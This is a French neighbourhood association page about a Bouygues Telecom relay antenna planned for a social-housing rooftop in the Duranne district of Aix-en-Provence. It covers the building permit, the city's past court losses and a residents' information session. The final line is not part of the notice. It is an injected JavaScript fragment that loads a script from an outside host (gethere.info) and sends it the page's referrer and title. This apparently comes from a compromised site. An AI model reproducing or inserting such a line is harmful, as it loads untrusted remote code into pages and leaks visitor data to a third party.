CIQ Durablement Duranne

Antenne relais Bouygues Telecom

Un nouveau projet d’implantation d’une antenne relais sur le bâtiment l’Avancado sis 85 Place Jean Dominique Cassini a été découvert par les habitants de l’Arbois en ce mois de février 2015.

La demande de permis, déposée  le 13-11-2014, émane de la société Bouygues Telecom, pour améliorer la couverture téléphonique sur la Duranne, à la suite de plusieurs demandes d’usagers de mobiles, insatisfaits.
Les antennes existantes de ce fournisseur Bouygues sont en périphérie du quartier de la Duranne, sur le technopôle de l’Arbois et dans la zone d’activités des Milles :

Le propriétaire de l’immeuble sur lequel sera implantée l’antenne, le bailleur social Pays d’Aix Habitat, a donné son accord pour louer sa toiture à BT.  Il est en effet plus facile de passer par des conventions avec les bailleurs sociaux pour l’implantation des antennes plutôt que par une multitude d’interlocuteurs privés.

La Mairie (via son service urbanisme), après avoir fait une instruction complète,  a délivré une déclaration préalable: DP n° 13 001 14J0717 le 11-12-2014.  Les dispositions règlementaires du PAZ de la Duranne, n’interdisant  pas l’installation d’antennes relais.

la Ville d’Aix a systématiquement été déboutée par le tribunal administratif (12 fois), chaque fois qu’elle s’est opposée à l’installation de ces antennes, et la législation est passée d’un principe de précaution à un principe d’attention. Voilà pourquoi le permis de construire a été délivré – avec quelques réserves…

Notre association a rencontré des responsables de la société et proposé, avec la mairie annexe, la tenue d’une permanence pour répondre aux questions des habitants. Cette permanence a eu lieu le vendredi 5 juin  de 12h à 14h et de 16h à 19h dans le petit local de la place del Bladeiras. Quelques habitants s’y sont rendus.

Document de présentation du projet : T23543 DIM

Le CIQ demandera un relevé des ondes auprès de l’agence nationale des fréquences, lorsque l’opération sera réalisée.

http://www.cartoradio.fr/cartoradio/web/html/mesures/

 

Un collectif d’habitants contre ce projet s’est constitué.

collectifArboiss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;